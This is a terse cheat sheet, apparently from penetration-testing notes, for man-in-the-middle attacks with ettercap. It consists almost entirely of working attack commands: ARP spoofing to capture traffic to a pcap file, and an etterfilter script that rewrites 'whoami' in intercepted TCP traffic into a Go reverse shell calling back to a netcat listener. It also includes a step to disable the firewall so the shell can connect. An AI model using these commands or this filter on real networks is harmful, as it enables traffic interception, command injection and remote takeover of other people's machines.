MITM (Man in the Middle) Attack

Establish MITM

Using ARP Spoofing

In the target machine,

# -T: text only GUI
# -M: man-in-the-middle attack
# -w: write .pcap file
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap

In your local machine, transfer the ettercap's output file.

scp victim@<target-ip>:/tmp/ettercap.pcap .

# Investigate the file
wireshark ettercap.pcap

Gain Access to a Shell

Reverse Shell Via ARP Spoofing

In the target machine, create "whoami.ecf" using Golang.

// whoami.ecf
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami")) {
    log(DATA.data, "/root/ettercap.log");
    replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<target-eth1-ip>:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &");
    msg("###### ETTERFILTER: substituted 'whoami' with reverse shell.  ######\n");

Compile the file using etterfilter

# Compile the file using etterfilter
etterfilter whoami.ecf -o whoami.ef

Open listener on background

nc -lvnp 6666 &

Disable Firewall for incoming connection

ufw allow in on eth1 from <target-ip> to <target-eth1-ip> port 6666 proto tcp
# or
ufw disable

Execute ettercap command.

# Run ettercap
# -F: Filter
ettercap -T -i eth1 -M arp -F whoami.ef

After a while, you should see "Connection received on \" in the outputs.
If so, quit "ettercap" with "q" and switch the opening listener to foreground with "fg".
Then you can interecat with the target shell.